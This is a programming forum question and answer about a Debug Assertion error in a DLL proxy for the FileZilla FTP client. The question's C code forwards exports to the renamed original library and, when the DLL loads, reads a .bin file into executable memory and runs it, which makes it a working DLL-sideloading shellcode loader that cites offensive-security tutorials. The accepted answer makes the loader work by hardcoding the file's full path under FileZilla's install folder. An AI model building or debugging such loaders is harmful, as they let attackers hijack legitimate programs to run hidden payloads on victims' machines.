I get the error "Debug Assertion Failed" when executing my .exe via the Start-Process command in PowerShell. I do not get this error when executing it normally via File Explorer (double-click). Please see the error below.
There have been similar questions on this forum that have suggested I add the following code to mute the error:
#define NDEBUG
#include <assert.h>
While solving the error is best practice, I would like to know why the above doesn't work for me. For greater context, I am doing a DLL proxy.
#include "pch.h"
#include <stdio.h>
#include <stdlib.h>
// NDEBUG only compiles out assert() calls that are expanded in this file after
// this point. NOTE(review): the "Debug Assertion Failed" dialog presumably comes
// from parameter checks inside the debug C runtime itself (e.g. a NULL FILE*
// reaching fseek), which this macro cannot switch off - confirm against the
// file/line shown in the dialog.
#define NDEBUG
#include <assert.h>
// NOTE(review): this macro is defined after <stdio.h>/<stdlib.h> were already
// included, so it likely has no effect on them; the pragma on the next line is
// what actually silences warning 4996.
#define _CRT_SECURE_NO_DEPRECATE
#pragma warning (disable : 4996)
// Linker export forwarder: exports _nettle_aeads (ordinal 1) from this DLL and
// forwards it to tmpC652._nettle_aeads (presumably the renamed original library).
// Exports that forward wholesale to a differently named module are a trait of
// DLL proxying that defenders can look for when triaging a suspicious DLL.
#pragma comment(linker, "/export:_nettle_aeads=tmpC652._nettle_aeads,@1")
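/*
 * Thread entry point: reads fz-dump-26072022-1635.bin into memory, copies it
 * into a freshly committed executable region and calls it as a function.
 *
 * lpParameter is unused. Returns 0 once the called code returns, and 1 if the
 * file could not be read or memory could not be obtained.
 *
 * NOTE(review): the file contents are executed without any integrity check,
 * and the relative file name is resolved against the process's current working
 * directory, so whoever controls that directory controls what runs here. A
 * PAGE_EXECUTE_READWRITE allocation followed by a call into it is also a
 * pattern that endpoint protection commonly flags.
 */
DWORD WINAPI DoMagic(LPVOID lpParameter)
{
    //https://stackoverflow.com/questions/14002954/c-programming-how-to-read-the-whole-file-contents-into-a-buffer
    DWORD rc = 1;
    FILE* fp = NULL;
    unsigned char* buffer = NULL;
    void* exec = NULL;
    long len = 0;
    size_t size = 0;

    (void)lpParameter;

    fp = fopen("fz-dump-26072022-1635.bin", "rb");
    if (fp == NULL) {
        // A NULL stream handed to fseek/ftell/fread is what trips the debug
        // runtime's assertion; stop here with an ordinary error instead.
        goto out;
    }

    if (fseek(fp, 0, SEEK_END) != 0) {
        goto out;
    }
    // ftell reports failure as -1L; keep it signed until it has been checked so
    // an error cannot turn into a huge size_t.
    len = ftell(fp);
    if (len <= 0) {
        goto out;
    }
    if (fseek(fp, 0, SEEK_SET) != 0) {
        goto out;
    }
    size = (size_t)len;

    buffer = (unsigned char*)malloc(size);
    if (buffer == NULL) {
        goto out;
    }

    //https://ired.team/offensive-security/code-injection-process-injection/loading-and-executing-shellcode-from-portable-executable-resources
    // One item of `size` bytes: anything other than 1 means a short read.
    if (fread(buffer, size, 1, fp) != 1) {
        goto out;
    }

    exec = VirtualAlloc(NULL, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (exec == NULL) {
        goto out;
    }
    memcpy(exec, buffer, size);

    // The staging copy and the stream are no longer needed once the bytes are
    // in the executable region; release them before control leaves this code.
    free(buffer);
    buffer = NULL;
    fclose(fp);
    fp = NULL;

    ((void(*) ())exec)();
    rc = 0;

out:
    free(buffer);
    if (fp != NULL) {
        fclose(fp);
    }
    return rc;
}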
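/*
 * DLL entry point. On process attach it starts DoMagic on a new thread and
 * drops the thread handle straight away, since nothing waits on that thread.
 * All other notifications are ignored. Always returns TRUE, so the load is
 * reported as successful even if the thread could not be created.
 *
 * hModule and lpReserved are unused.
 */
BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD ul_reason_for_call,
    LPVOID lpReserved
)
{
    HANDLE threadHandle;

    (void)hModule;
    (void)lpReserved;

    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        // https://gist.github.com/securitytube/c956348435cc90b8e1f7
        // The work runs on its own thread rather than inline in DllMain.
        threadHandle = CreateThread(NULL, 0, DoMagic, NULL, 0, NULL);
        // CreateThread returns NULL on failure; only close a real handle.
        if (threadHandle != NULL) {
            CloseHandle(threadHandle);
        }
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
    default:
        break;
    }
    return TRUE;
}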
There are many more pragmas in the above code. Approx 400 more lines of similar export functions.
CodePudding user response:
The solution is quite simple, adding the full path...
fp = fopen("C:\\Program Files\\FileZilla FTP Client\\fz-dump-26072022-1635.bin", "rb");
I found that the value of fp was NULL when executing via the PowerShell command Start-Process. This is because the relative file name fz-dump-26072022-1635.bin was resolved against the directory where PowerShell is called from, which is C:\Windows\System32\WindowsPowerShell\v1.0\, so fopen could not find the file there. This explains why double-clicking on the .exe works with no error, as the value of fp is correct, while calling it from any other directory doesn't work. Checking the return value of fopen before using fp would have reported this as an ordinary error instead of an assertion.